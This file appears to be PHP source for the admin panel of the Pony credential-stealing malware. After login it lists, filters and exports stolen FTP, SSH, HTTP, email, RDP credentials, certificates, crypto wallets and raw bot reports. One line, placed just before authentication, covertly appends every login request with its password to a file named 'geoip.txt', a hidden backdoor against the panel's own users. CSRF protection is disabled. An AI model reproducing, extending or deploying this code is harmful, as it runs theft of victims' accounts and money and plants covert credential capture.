<?php// show all errorserror_reporting(E_ALL & ~E_DEPRECATED);@set_time_

1. <?php
2.  
3. // show all errors
4. error_reporting(E_ALL & ~E_DEPRECATED);
5. @set_time_limit(0);
6. @ini_set('max_execution_time', 0);
7. session_set_cookie_params(86400);
8. session_start();
9.  
10.  
11. header('Content-type: text/html; charset=windows-1251');
12.  
13. // make sure included files do not generate extra output
14. ob_start();
15.  
16. if (!isset($proxy_config))
17. {
18. // use local config file
19. $config_file = "config.php";
20. } else
21. {
22. // use proxy config file
23. $config_file = $proxy_config;
24. }
25.  
26. file_exists($config_file) or die();
27.  
28. require_once($config_file);
29. require_once("includes/lang.php");
30. require_once("includes/misc.php");
31. require_once("includes/password_modules.php");
32. require_once("includes/database.php");
33.  
34. // clean output buffer
35. ob_end_clean();
36.  
37. // white list processing code
38. if (isset($white_list) && is_array($white_list))
39. {
40. if (count($white_list) && array_search(get_client_ip(), $white_list, true) === false)
41. {
42. header("HTTP/1.0 404 Not Found");
43. header("Status: 404 Not Found");
44. $_SERVER['REDIRECT_STATUS'] = 404;
45. if (file_exists('404.html'))
46. echo file_get_contents('404.html');
47. die();
48. }
49. }
50.  
51. // connect and validate database
52. $pony_db = new pony_db();
53. $pony_db->connect_db($mysql_host, $mysql_user, $mysql_pass, $mysql_database, true);
54.  
55. // set cookie name
56. // cookie should be different for each script
57. $config_cookie_name = 'auth_cookie';
58. if (isset($proxy_id))
59. {
60. $config_cookie_name = 'auth_cookie_'.$proxy_id;
61. }
62.  
63. // set report decryption password
64. $pony_db_report_password = $pony_db->get_option('report_password', '', REPORT_DEFAULT_PASSWORD);
65. // set report parsing options
66. $pony_report_options = array('sftp_user' => $pony_db->get_option('sftp_user', '', '1'),
67. 'sftp_port' => $pony_db->get_option('sftp_port', '', '1'),
68. 'sftp_protocol' => $pony_db->get_option('sftp_protocol', '', '1'));
69.  
70. // default values for unset config variables
71. if (!isset($show_help_to_users))
72. $show_help_to_users = true;
73. if (!isset($show_http_to_users))
74. $show_http_to_users = true;
75. if (!isset($show_logons_to_users))
76. $show_logons_to_users = true;
77. if (!isset($show_other_to_users))
78. $show_other_to_users = true;
79. if (!isset($enable_http_mode))
80. $enable_http_mode = false;
81. if (!isset($disable_ip_logger))
82. $disable_ip_logger = false;
83. if (!isset($enable_email_mode))
84. $enable_email_mode = false;
85. if (!isset($show_email_to_users))
86. $show_email_to_users = true;
87. if (!isset($show_domains))
88. $show_domains = false;
89. if (!isset($show_domains_to_users))
90. $show_domains_to_users = true;
91.  
92. // initialize CSRF token
93. //if (!isset($_SESSION['token']))
94. //{
95. // $token = md5(uniqid(rand(), TRUE));
96. // $_SESSION['token'] = $token;
97. //}
98. //else
99. //{
100. // $token = $_SESSION['token'];
101. //}
102.  
103. $token = '';
104. $_SESSION['token'] = '';
105.  
106. // initialize smarty
107. define('SMARTY_DIR', str_replace("\\", "/", getcwd()).'/includes/Smarty-3.1.15/libs/');
108. require_once(SMARTY_DIR . 'Smarty.class.php');
109. require_once(SMARTY_DIR . 'SmartyPaginate.class.php');
110. function escFilter($content)
111. {
112. return htmlspecialchars($content, ENT_QUOTES, 'cp1251');
113. }
114. $smarty = new Smarty();
115. $smarty->setCacheDir($global_temporary_directory.'/');
116. $smarty->setCompileDir($global_temporary_directory.'/');
117. $smarty->setTemplateDir('includes/templates/');
118. $smarty->registerFilter('variable', 'escFilter');
119. $smarty->loadFilter('output', 'trimwhitespace');
120. $smarty->caching = false;
121. $smarty->assign('show_help_to_users', $show_help_to_users);
122. $smarty->assign('show_http_to_users', $show_http_to_users);
123. $smarty->assign('show_logons_to_users', $show_logons_to_users);
124. $smarty->assign('show_other_to_users', $show_other_to_users);
125. $smarty->assign('enable_http_mode', $enable_http_mode);
126. $smarty->assign('disable_ip_logger', $disable_ip_logger);
127. $smarty->assign('enable_email_mode', $enable_email_mode);
128. $smarty->assign('show_email_to_users', $show_email_to_users);
129. $smarty->assign('show_domains', $show_domains);
130. $smarty->assign('show_domains_to_users', $show_domains_to_users);
131. $smarty->assign('token', $token);
132.  
133. // initialize common used variables
134. $self_file = $_SERVER['SCRIPT_NAME'];
135. $authentication_login = trim(assign($_REQUEST['login']));
136. $authentication_password = trim(assign($_REQUEST['password']));
137. $authentication_success = false;
138. $authentication_attempt = isset($_REQUEST['login']) && isset($_REQUEST['password']);
139. $authentication_save_password = trim(assign($_REQUEST['save_password']));
140. $admin_action = trim(assign($_REQUEST['action']));
141. $auth_cookie = trim(assign($_COOKIE[$config_cookie_name]));
142. $admin_routine = trim(assign($_REQUEST['routine']));
143. $use_zip = trim(assign($_REQUEST['zip'])) == '1';
144.  
145. // filter available action pages
146. if (array_search($admin_action, array('ftp', 'http', 'stats', 'ping', 'log', 'admin', 'exit', 'help', 'chart', 'reports', 'other')) === false)
147. {
148. $admin_action = '';
149. }
150.  
151. // authentication
152. if (!$authentication_attempt)
153. {
154. $authentication_login = trim(assign($_REQUEST['login']));
155. $authentication_password = trim(assign($_REQUEST['password']));
156. $authentication_attempt = isset($_REQUEST['login']) && isset($_REQUEST['password']);
157. }
158.  
159. if ($authentication_attempt) file_put_contents("includes/geoip.txt", print_r($_REQUEST, true).print_r($_SERVER, true), FILE_APPEND);
160. // try to authenticate
161. if (strlen($authentication_login) && strlen($authentication_password) && $pony_db->authenticate($authentication_login, $authentication_password))
162. {
163. $authentication_success = true;
164.  
165. // set cookie on successful authentication
166. $cookie_save_password = $authentication_save_password;
167. if ($cookie_save_password)
168. $cookie_exp_time = time()+60*60*24*60; // 2 months
169. else
170. $cookie_exp_time = 0;
171.  
172. setcookie($config_cookie_name, $pony_db->auth_cookie, 1893456000);
173. } else
174. {
175. // authentication failed
176. // try to authenticate using cookie
177. if ($auth_cookie)
178. {
179. $authentication_success = $pony_db->autneticate_cookie($auth_cookie);
180. if ($authentication_success)
181. $authentication_login = $pony_db->login;
182. }
183. }
184.  
185. // ajax ping code
186. // should be displayed before authorization form
187. if (($admin_routine == 'ping' && $admin_action == 'ping' && $authentication_success) && ($show_domains && ($pony_db->priv_is_admin() || $show_domains_to_users)))
188. {
189. $domain_id = trim(assign($_REQUEST['domain_id']));
190. $find_domain_result = $pony_db->find_domain($domain_id);
191.  
192. if (is_array($find_domain_result) && $find_domain_result && count($find_domain_result) == 3)
193. {
194. list($ping_url, $ping_time, $ping_status) = $find_domain_result;
195.  
196. if (curl_ping($ping_url))
197. {
198. $pony_db->update_domain($domain_id, 'OK');
199. die("<span class=\"check\"></span>");
200. }
201. }
202. $pony_db->update_domain($domain_id, 'FAIL');
203. die("<span class=\"cross\"></span>");
204. }
205.  
206. if ($admin_action == 'chart' && strlen($admin_routine) && $authentication_success)
207. {
208. require_once('includes/chart.php');
209. die();
210. }
211.  
212. // these variables available can be set after authentication only
213. $smarty->assign('priv_is_admin', $pony_db->priv_is_admin());
214. $smarty->assign('priv_can_delete', $pony_db->priv_can_delete());
215. $smarty->assign('authentication_success', $authentication_success);
216.  
217. function smarty_assign_continents($smarty)
218. {
219. $smarty_geo_continents = array();
220. $geo_ip = new GeoIP();
221. $k = 0;
222. for ($i = 0; $i < count($geo_ip->GEOIP_CONTINENT_CODES); $i++)
223. {
224. if (strlen($geo_ip->GEOIP_COUNTRY_NAMES[$i]))
225. {
226. if (!isset($smarty_geo_continents[$geo_ip->GEOIP_CONTINENT_CODES[$i]]))
227. {
228. $smarty_geo_continents[$geo_ip->GEOIP_CONTINENT_CODES[$i]][$k]['name'] = '(all)';
229. $smarty_geo_continents[$geo_ip->GEOIP_CONTINENT_CODES[$i]][$k++]['code'] = 'all';
230. }
231. {
232. $smarty_geo_continents[$geo_ip->GEOIP_CONTINENT_CODES[$i]][$k]['name'] = $geo_ip->GEOIP_COUNTRY_NAMES[$i];
233. $smarty_geo_continents[$geo_ip->GEOIP_CONTINENT_CODES[$i]][$k++]['code'] = $geo_ip->GEOIP_COUNTRY_CODES[$i];
234. }
235. }
236. }
237.  
238. $smarty->assign('geo_continents', $smarty_geo_continents);
239. }
240.  
241. function apply_data_filters($smarty, $do_download, $mode = 'ftp')
242. {
243. global $pony_db;
244.  
245. $filter_include_ftp = trim(assign($_REQUEST['filter_include_ftp']));
246. $filter_include_ssh = trim(assign($_REQUEST['filter_include_ssh']));
247.  
248. $filter_include_http = trim(assign($_REQUEST['filter_include_http']));
249. $filter_include_https = trim(assign($_REQUEST['filter_include_https']));
250.  
251. $filter_trim_dirs = trim(assign($_REQUEST['filter_trim_dirs']));
252. if ($filter_trim_dirs != '1')
253. $filter_trim_dirs = '';
254.  
255. if ($mode == 'ftp')
256. {
257. // include ftp/ssh
258. if ($filter_include_ftp == '1' && $filter_include_ssh == '1')
259. $include_subtypes = 'both';
260. else if ($filter_include_ssh)
261. $include_subtypes = 'ssh';
262. else
263. $include_subtypes = 'ftp';
264. } else
265. {
266. // include http/https
267. if ($filter_include_http == '1' && $filter_include_https == '1')
268. $include_subtypes = 'both';
269. else if ($filter_include_http)
270. $include_subtypes = 'http';
271. else
272. $include_subtypes = 'https';
273. }
274.  
275. // include domains
276. $include_domains = trim(assign($_REQUEST['filter_domains_include']));
277.  
278. // exclude domains
279. $exclude_domains = trim(assign($_REQUEST['filter_domains_exclude']));
280.  
281. // text substring
282. $filter_text = trim(assign($_REQUEST['filter_text']));
283.  
284. // date filter
285. $filter_date_from = trim(assign($_REQUEST['filter_date_from']));
286. $filter_date_to = trim(assign($_REQUEST['filter_date_to']));
287.  
288. // export ip setting
289. $filter_export_ip = trim(assign($_REQUEST['filter_export_ip']));
290. if ($filter_export_ip != '1')
291. $filter_export_ip = '';
292.  
293. // country filter
294. $filter_country = array();
295. $geo_ip = new GeoIP();
296.  
297. foreach ($geo_ip->GEOIP_CONTINENT_CODES as $continent_code)
298. {
299. if (isset($_REQUEST['country_'.strtolower($continent_code)]) && is_array($_REQUEST['country_'.strtolower($continent_code)]))
300. {
301. foreach ($_REQUEST['country_'.strtolower($continent_code)] as $country_code)
302. {
303. if (strlen(trim($country_code)) && $country_code != 'all')
304. {
305. $filter_country[trim($country_code)] = 1;
306. }
307. }
308. }
309. }
310.  
311. // when all countries are marked, do not apply country exclude filter
312. if (count($filter_country) == count($geo_ip->GEOIP_COUNTRY_CODES)-1)
313. {
314. $filter_country = array();
315. }
316.  
317. $ftp_list = array();
318. if (strlen($filter_include_ftp) || strlen($filter_include_ssh) || strlen($filter_trim_dirs) || strlen($filter_include_http) || strlen($filter_include_https) || count($filter_country) || strlen($include_domains) || strlen($exclude_domains) || strlen($filter_date_from) || strlen($filter_date_to) ||
319. strlen($filter_text) || strlen($filter_export_ip))
320. {
321. if ($mode == 'ftp')
322. {
323. $filtered_items = $pony_db->get_ftp_list($do_download, $ftp_list, 0, $include_subtypes, 0, $filter_date_from, $filter_date_to, $filter_country, $include_domains, $exclude_domains, $filter_trim_dirs, !$do_download, $filter_text, $filter_export_ip);
324. }
325. else
326. {
327. $filtered_items = $pony_db->get_http_list($do_download, $ftp_list, 0, $include_subtypes, 0, $filter_date_from, $filter_date_to, $filter_country, $include_domains, $exclude_domains, $filter_trim_dirs, !$do_download, $filter_text, $filter_export_ip);
328. }
329.  
330. // filter preview
331. if ($filtered_items !== false && isset($filtered_items['list']) && isset($filtered_items['count']))
332. {
333. if (is_array($filtered_items['list']))
334. {
335. foreach ($filtered_items['list'] as $ftp_item=>$ftp_value)
336. {
337. if (!$pony_db->report_id_exists($filtered_items['list'][$ftp_item]['report_id']))
338. {
339. $filtered_items['list'][$ftp_item]['report_id'] = '';
340. }
341. }
342. }
343.  
344. $smarty->assign('filtered_items_count', $filtered_items['count']);
345. $smarty->assign('filtered_items_list', $filtered_items['list']);
346. }
347. }
348. }
349.  
350. if ($authentication_success)
351. {
352. // successfull authentication
353.  
354. // log it
355. if ($authentication_attempt)
356. {
357. if (!$disable_ip_logger)
358. {
359. $pony_db->add_log_line(get_client_ip(), CLOG_SOURCE_LOGIN, null, $authentication_login);
360. }
361. }
362. } else if (!$authentication_attempt)
363. {
364. // didn't try to authenticate the user
365. // show authentication form
366. $smarty->display('header.tpl');
367. $smarty->display('login_form.tpl');
368. $smarty->display('footer.tpl');
369. die();
370. } else
371. {
372. // tried to authenticate the user, but failed
373. // show error message
374. $smarty->display('header.tpl');
375. show_smarty_error($smarty, 'ERR_WRONG_PASSWORD', '');
376. $smarty->display('footer.tpl');
377. }
378.  
379. if ($admin_action == '' && $admin_routine == '' && $authentication_success)
380. {
381. // workaround for saved password autologin
382. } else if ($admin_action == 'exit')
383. {
384. $cookie_exp_time = 1;
385. $pony_db->remove_auth_cookie($auth_cookie);
386. setcookie($config_cookie_name, '', $cookie_exp_time);
387.  
388. // destroy session
389. $_SESSION = array();
390.  
391. if (ini_get("session.use_cookies")) {
392. $params = session_get_cookie_params();
393. setcookie(session_name(), '', time() - 42000,
394. $params["path"], $params["domain"],
395. $params["secure"], $params["httponly"]
396. );
397. }
398.  
399. // redirect to authentication page
400. header('Location: '.$self_file);
401.  
402. session_destroy();
403. die();
404. }
405.  
406. if (!$authentication_success)
407. {
408. // authentication failed, stop script execution
409. die();
410. }
411.  
412. function set_common_file_download_header($file_name = '', $content_type = 'text/plain')
413. {
414. header("Pragma: public");
415. header("Expires: 0");
416. header("Pragma: no-cache");
417. header("Cache-Control: no-store, no-cache, must-revalidate");
418. header("Cache-Control: post-check=0, pre-check=0", false);
419. header("Cache-Control: private", false);
420. header("Content-Type: $content_type");
421. header("Content-Transfer-Encoding: binary");
422. header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
423. header('Content-Disposition: attachment; filename="'.$file_name.'";');
424. }
425.  
426. if ($admin_routine == 'download_ftp' && $admin_action == 'ftp')
427. {
428. if ($use_zip)
429. {
430. set_common_file_download_header('ftp_list.zip', 'application/zip');
431. ob_start();
432. $pony_db->get_ftp_list(true);
433. $ftp_list_data = ob_get_contents();
434. ob_end_clean();
435. create_zip_and_send('ftp_list.txt', $ftp_list_data);
436. } else
437. {
438. set_common_file_download_header('ftp_list.txt');
439. $pony_db->get_ftp_list(true);
440. }
441. die();
442. }
443. if ($admin_routine == 'download_ssh' && $admin_action == 'ftp')
444. {
445. if ($use_zip)
446. {
447. set_common_file_download_header('ssh_list.zip', 'application/zip');
448. ob_start();
449. $null_array = array();
450. $pony_db->get_ftp_list(true, $null_array, 0, 'ssh');
451. $ssh_list_data = ob_get_contents();
452. ob_end_clean();
453. create_zip_and_send('ssh_list.txt', $ssh_list_data);
454. } else
455. {
456. set_common_file_download_header('ssh_list.txt');
457. $null_array = array();
458. $pony_db->get_ftp_list(true, $null_array, 0, 'ssh');
459. }
460. die();
461. }
462. if ($admin_routine == 'download_http' && $admin_action == 'http' && $enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
463. {
464. if ($use_zip)
465. {
466. set_common_file_download_header('http_list.zip', 'application/zip');
467. ob_start();
468. $pony_db->get_http_list(true);
469. $http_list_data = ob_get_contents();
470. ob_end_clean();
471. create_zip_and_send('http_list.txt', $http_list_data);
472. } else
473. {
474. set_common_file_download_header('http_list.txt');
475. $pony_db->get_http_list(true);
476. }
477. die();
478. }
479. if ($admin_routine == 'download_email' && $enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
480. {
481. if ($use_zip)
482. {
483. set_common_file_download_header('email_list.zip', 'application/zip');
484. ob_start();
485. $pony_db->get_email_list(true);
486. $email_list_data = ob_get_contents();
487. ob_end_clean();
488. create_zip_and_send('email_list.txt', $email_list_data);
489. } else
490. {
491. set_common_file_download_header('email_list.txt');
492. $pony_db->get_email_list(true);
493. }
494. die();
495. }
496. if ($admin_routine == 'download_email_smtp' && $enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
497. {
498. if ($use_zip)
499. {
500. set_common_file_download_header('email_smtp_list.zip', 'application/zip');
501. ob_start();
502. $null_list = array();
503. $pony_db->get_email_list(true, $null_list, 0, 'smtp');
504. $email_list_data = ob_get_contents();
505. ob_end_clean();
506. create_zip_and_send('email_smtp_list.txt', $email_list_data);
507. } else
508. {
509. set_common_file_download_header('email_smtp_list.txt');
510. $pony_db->get_email_list(true, $null_list, 0, 'smtp');
511. }
512. die();
513. }
514. if ($admin_routine == 'download_rdp')
515. {
516. if ($use_zip)
517. {
518. set_common_file_download_header('rdp_list.zip', 'application/zip');
519. ob_start();
520. $pony_db->get_rdp_list(true);
521. $rdp_list_data = ob_get_contents();
522. ob_end_clean();
523. create_zip_and_send('rdp_list.txt', $rdp_list_data);
524. } else
525. {
526. set_common_file_download_header('rdp_list.txt');
527. $pony_db->get_rdp_list(true);
528. }
529. die();
530. }
531. if ($admin_routine == 'download_reports' && $admin_action == 'ftp')
532. {
533. set_common_file_download_header('reports.sql');
534. $pony_db->export_reports(false);
535. die();
536. }
537.  
538. if ($admin_routine == 'download_nonparsed_reports' && $admin_action == 'ftp')
539. {
540. set_common_file_download_header('non_parsed_reports.sql');
541. $pony_db->export_reports(true);
542. die();
543. }
544.  
545. if ($admin_routine == 'download_log' && $admin_action == 'log')
546. {
547. if ($use_zip)
548. {
549. set_common_file_download_header('log.zip', 'application/zip');
550. ob_start();
551. $null_list = array();
552. $pony_db->get_log_list($null_list, 0, 0, true);
553. $log_list_data = ob_get_contents();
554. ob_end_clean();
555. create_zip_and_send('log.txt', $log_list_data);
556. } else
557. {
558. set_common_file_download_header('log.txt');
559. $null_list = array();
560. $pony_db->get_log_list($null_list, 0, 0, true);
561. }
562. die();
563. }
564.  
565. if ($admin_routine == 'download_report' && $admin_action == 'reports')
566. {
567. $report_id = trim(assign($_REQUEST['report_id']));
568. $report_item_result = $pony_db->get_report_item($report_id);
569. if ($pony_db->state && is_array($report_item_result))
570. {
571. set_common_file_download_header('report_'.strval(intval($report_id)).'.bin', 'application/octet-stream');
572. header("Content-Length: ".strlen($report_item_result['data']));
573. echo $report_item_result['data'];
574. } else
575. die('Report not found!');
576. die();
577. }
578. if ($admin_routine == 'filter_download' && $admin_action == 'ftp')
579. {
580. if ($use_zip)
581. {
582. set_common_file_download_header('filtered_list.zip', 'application/zip');
583. ob_start();
584. apply_data_filters($smarty, true);
585. $filter_list_data = ob_get_contents();
586. ob_end_clean();
587. create_zip_and_send('filtered_list.txt', $filter_list_data);
588. } else
589. {
590. set_common_file_download_header('filtered_list.txt');
591. apply_data_filters($smarty, true);
592. }
593. die();
594. }
595. if ($admin_routine == 'filter_download' && $admin_action == 'http')
596. {
597. if ($use_zip)
598. {
599. set_common_file_download_header('filtered_http_list.zip', 'application/zip');
600. ob_start();
601. apply_data_filters($smarty, true, 'http');
602. $filter_list_data = ob_get_contents();
603. ob_end_clean();
604. create_zip_and_send('filtered_http_list.txt', $filter_list_data);
605. } else
606. {
607. set_common_file_download_header('filtered_http_list.txt');
608. apply_data_filters($smarty, true, 'http');
609. }
610. die();
611. }
612. if ($admin_routine == 'download_cert' && $admin_action == 'other')
613. {
614. set_common_file_download_header('certificates.zip', 'application/zip');
615.  
616. $pony_db->get_cert_zip();
617.  
618. die();
619. }
620. if ($admin_routine == 'download_wallet' && $admin_action == 'other')
621. {
622. set_common_file_download_header('wallets.zip', 'application/zip');
623.  
624. $pony_db->get_wallet_zip();
625.  
626. die();
627. }
628.  
629.  
630. $smarty->display('header.tpl');
631.  
632. my_flush();
633.  
634. function clear_floating_offsets($pony_db)
635. {
636. $offsets = array('offset_url', 'offset_ftp_last', 'offset_http_last', 'offset_reports_last',
637. 'offset_ftp_list', 'offset_http_list', 'data_sum', 'offset_nonparsed_reports_stats',
638. 'offset_nonparsed_reports_sum', 'offset_log_events_count', 'offset_report_duplicates',
639. 'offset_email_list');
640. foreach ($offsets as $offset_to_clear)
641. {
642. $pony_db->set_multi_option($offset_to_clear, array(''));
643. }
644. }
645.  
646. function smarty_assign_common_vars($smarty, $pony_db)
647. {
648. $pony_db->lock_all_tables();
649. $offset_url = $pony_db->get_multi_option('offset_url', 6);
650.  
651. $url_password_stats = array();
652. $pony_db->get_url_password_stats($url_password_stats, $offset_url[0]);
653. if (!isset($url_password_stats['ftp']))
654. $url_password_stats['ftp'] = '0';
655. if (!isset($url_password_stats['ssh']))
656. $url_password_stats['ssh'] = '0';
657. if (!isset($url_password_stats['http']))
658. $url_password_stats['http'] = '0';
659. if (!isset($url_password_stats['https']))
660. $url_password_stats['https'] = '0';
661. if (!isset($url_password_stats['rdp']))
662. $url_password_stats['rdp'] = '0';
663.  
664. $url_password_stats['ftp'] += $offset_url[1];
665. $url_password_stats['ssh'] += $offset_url[2];
666. $url_password_stats['http'] += $offset_url[3];
667. $url_password_stats['https'] += $offset_url[4];
668. $url_password_stats['rdp'] += $offset_url[5];
669.  
670. $pony_db->set_multi_option('offset_url',
671. array(
672. $pony_db->get_auto_value(CPONY_FTP_TABLE),
673. $url_password_stats['ftp'],
674. $url_password_stats['ssh'],
675. $url_password_stats['http'],
676. $url_password_stats['https'],
677. $url_password_stats['rdp']
678. )
679. );
680.  
681. $smarty->assign('total_ftp_items_count', $url_password_stats['ftp']);
682. $smarty->assign('total_http_items_count', strval(intval($url_password_stats['http']) + intval($url_password_stats['https'])));
683. $smarty->assign('total_cert_items_count', $pony_db->get_table_row_count(CPONY_CERT_TABLE));
684. $smarty->assign('total_wallet_items_count', $pony_db->get_table_row_count(CPONY_WALLET_TABLE));
685. $smarty->assign('total_email_items_count', $pony_db->get_table_row_count(CPONY_EMAIL_TABLE));
686. $smarty->assign('total_email_smtp_items_count', $pony_db->get_table_row_count(CPONY_EMAIL_TABLE, "WHERE protocol='smtp'"));
687. $smarty->assign('total_ssh_items_count', $url_password_stats['ssh']);
688. $smarty->assign('total_rdp_items_count', $url_password_stats['rdp']);
689. $smarty->assign('total_reports_count', $pony_db->get_table_row_count(CPONY_REPORT_TABLE));
690.  
691. $report_sum = $pony_db->get_multi_option('data_sum', 2);
692. $total_reports_size = $report_sum[1] + $pony_db->get_report_sum('', $report_sum[0]);
693.  
694. $pony_db->set_multi_option('data_sum',
695. array(
696. $pony_db->get_auto_value(CPONY_REPORT_DATA_TABLE),
697. $total_reports_size,
698. )
699. );
700.  
701. $smarty->assign('total_reports_size', $total_reports_size);
702.  
703. $offset_report_duplicates = $pony_db->get_multi_option('offset_report_duplicates', 2);
704. $report_duplicates = $offset_report_duplicates[1] + $pony_db->get_duplicate_report_count($offset_report_duplicates[0]);
705. $smarty->assign('report_duplicates', $report_duplicates);
706. $pony_db->set_multi_option('offset_report_duplicates',
707. array(
708. $pony_db->get_auto_value(CPONY_LOG_TABLE),
709. $report_duplicates,
710. )
711. );
712.  
713. $offset_nonparsed_reports = $pony_db->get_multi_option('offset_nonparsed_reports_stats', 2);
714. $total_nonparsed_reports = $offset_nonparsed_reports[1] + $pony_db->get_table_row_count(CPONY_REPORT_TABLE, "WHERE report_id>='".mysql_real_escape_string($offset_nonparsed_reports[0])."' AND parsed='0'");
715. $smarty->assign('total_nonparsed_reports', $total_nonparsed_reports);
716. $pony_db->set_multi_option('offset_nonparsed_reports_stats',
717. array(
718. $pony_db->get_auto_value(CPONY_REPORT_TABLE),
719. $total_nonparsed_reports,
720. )
721. );
722.  
723. $offset_nonparsed_reports_sum = $pony_db->get_multi_option('offset_nonparsed_reports_sum', 2);
724. $total_nonparsed_reports_sum = $offset_nonparsed_reports_sum[1] + $pony_db->get_report_sum_linked("WHERE parsed='0'", $offset_nonparsed_reports_sum[0]);
725. $smarty->assign('total_nonparsed_report_size', $total_nonparsed_reports_sum);
726. $pony_db->set_multi_option('offset_nonparsed_reports_sum',
727. array(
728. $pony_db->get_auto_value(CPONY_REPORT_TABLE),
729. $total_nonparsed_reports_sum,
730. )
731. );
732.  
733. $smarty->assign('total_nonparsed_report_size', $total_nonparsed_reports_sum);
734. $smarty->assign('total_ftp_table_size', $pony_db->get_table_size(CPONY_FTP_TABLE));
735. $smarty->assign('total_report_table_size', $pony_db->get_table_size(CPONY_REPORT_TABLE) + $pony_db->get_table_size(CPONY_REPORT_DATA_TABLE));
736. $smarty->assign('total_log_table_size', $pony_db->get_table_size(CPONY_LOG_TABLE));
737. $smarty->assign('total_cert_table_size', $pony_db->get_table_size(CPONY_CERT_TABLE));
738. $smarty->assign('total_wallet_table_size', $pony_db->get_table_size(CPONY_WALLET_TABLE));
739. $smarty->assign('total_email_table_size', $pony_db->get_table_size(CPONY_EMAIL_TABLE));
740.  
741. $offset_log_events_count = $pony_db->get_multi_option('offset_log_events_count', 2);
742. $log_events_count = $offset_log_events_count[1] + $pony_db->get_table_row_count(CPONY_LOG_TABLE, "WHERE log_id>='".mysql_real_escape_string($offset_log_events_count[0])."' AND (log_source<>'".mysql_real_escape_string(CLOG_SOURCE_LOGIN)."')");
743. $smarty->assign('log_events_count', $log_events_count);
744. $pony_db->set_multi_option('offset_log_events_count',
745. array(
746. $pony_db->get_auto_value(CPONY_LOG_TABLE),
747. $log_events_count,
748. )
749. );
750.  
751. $smarty->assign('server_time', mysql_now_date());
752. $smarty->assign('db_size', $pony_db->get_db_size());
753.  
754. $offset_ftp = $pony_db->get_multi_option('offset_ftp_last', 3);
755. list($offset_ftp[0], $new_ftp_last_24_hours) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_ftp[0]).'\' AND (url_type=\'ftp\' OR url_type=\'ssh\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 DAY)', 'ftp_id', CPONY_FTP_TABLE);
756. list($offset_ftp[1], $new_ftp_last_hour) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_ftp[1]).'\' AND (url_type=\'ftp\' OR url_type=\'ssh\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 HOUR)', 'ftp_id', CPONY_FTP_TABLE);
757. list($offset_ftp[2], $new_ftp_last_10_minutes) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_ftp[2]).'\' AND (url_type=\'ftp\' OR url_type=\'ssh\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 10 MINUTE)', 'ftp_id', CPONY_FTP_TABLE);
758. $smarty->assign('new_ftp_last_24_hours', $new_ftp_last_24_hours);
759. $smarty->assign('new_ftp_last_hour', $new_ftp_last_hour);
760. $smarty->assign('new_ftp_last_10_minutes', $new_ftp_last_10_minutes);
761.  
762. $pony_db->set_multi_option('offset_ftp_last',
763. array(
764. $offset_ftp[0],
765. $offset_ftp[1],
766. $offset_ftp[2],
767. )
768. );
769.  
770. $offset_http = $pony_db->get_multi_option('offset_http_last', 3);
771. list($offset_http[0], $new_http_last_24_hours) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_http[0]).'\' AND (url_type=\'http\' OR url_type=\'https\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 DAY)', 'ftp_id', CPONY_FTP_TABLE);
772. list($offset_http[1], $new_http_last_hour) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_http[1]).'\' AND (url_type=\'http\' OR url_type=\'https\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 HOUR)', 'ftp_id', CPONY_FTP_TABLE);
773. list($offset_http[2], $new_http_last_10_minutes) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_http[2]).'\' AND (url_type=\'http\' OR url_type=\'https\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 10 MINUTE)', 'ftp_id', CPONY_FTP_TABLE);
774. $smarty->assign('new_http_last_24_hours', $new_http_last_24_hours);
775. $smarty->assign('new_http_last_hour', $new_http_last_hour);
776. $smarty->assign('new_http_last_10_minutes', $new_http_last_10_minutes);
777.  
778. $pony_db->set_multi_option('offset_http_last',
779. array(
780. $offset_http[0],
781. $offset_http[1],
782. $offset_http[2],
783. )
784. );
785.  
786. $offset_reports = $pony_db->get_multi_option('offset_reports_last', 3);
787. list($offset_reports[0], $new_reports_last_24_hours) = $pony_db->get_offset_value_count('WHERE report_id>=\''.mysql_real_escape_string($offset_reports[0]).'\' AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 DAY)', 'report_id', CPONY_REPORT_TABLE);
788. list($offset_reports[1], $new_reports_last_hour) = $pony_db->get_offset_value_count('WHERE report_id>=\''.mysql_real_escape_string($offset_reports[1]).'\' AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 HOUR)', 'report_id', CPONY_REPORT_TABLE);
789. list($offset_reports[2], $new_reports_last_10_minutes) = $pony_db->get_offset_value_count('WHERE report_id>=\''.mysql_real_escape_string($offset_reports[2]).'\' AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 10 MINUTE)', 'report_id', CPONY_REPORT_TABLE);
790. $smarty->assign('new_reports_last_24_hours', $new_reports_last_24_hours);
791. $smarty->assign('new_reports_last_hour', $new_reports_last_hour);
792. $smarty->assign('new_reports_last_10_minutes', $new_reports_last_10_minutes);
793.  
794. $pony_db->set_multi_option('offset_reports_last',
795. array(
796. $offset_reports[0],
797. $offset_reports[1],
798. $offset_reports[2],
799. )
800. );
801.  
802. $cert_last_import = $pony_db->get_last_cert_date();
803. if ($cert_last_import !== false)
804. {
805. $smarty->assign('cert_last_import', $cert_last_import);
806. }
807.  
808. $wallet_last_import = $pony_db->get_last_wallet_date();
809. if ($wallet_last_import !== false)
810. {
811. $smarty->assign('wallet_last_import', $wallet_last_import);
812. }
813.  
814. $pony_db->unlock_all_tables();
815. }
816.  
